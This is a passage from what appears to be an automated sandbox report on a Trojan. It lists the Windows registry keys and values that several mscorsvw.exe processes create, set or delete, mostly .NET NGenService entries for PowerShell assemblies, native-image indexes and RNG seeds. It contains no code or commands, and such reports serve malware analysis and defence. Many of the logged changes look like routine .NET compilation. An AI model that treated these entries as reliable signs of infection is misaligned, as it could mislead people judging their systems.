"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 3B 25 B9 4D 0F 20 4F CC 8D 79 F0 CB D9 05 36"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]
The process mscorsvw.exe:4088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 E6 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F2 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F0 00 00 00 53 00 79"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F4 A6 E3 8F 68 5B 48 44 26 58 06 53 2B 5E 45 11"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
"ImageList" = "01 00 00 00 00 02 00 00 00 FC 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"
The process mscorsvw.exe:2652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 07 56 C0 F4 06 DF 04 CF 79 9B 87 EB DF 30 C6"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
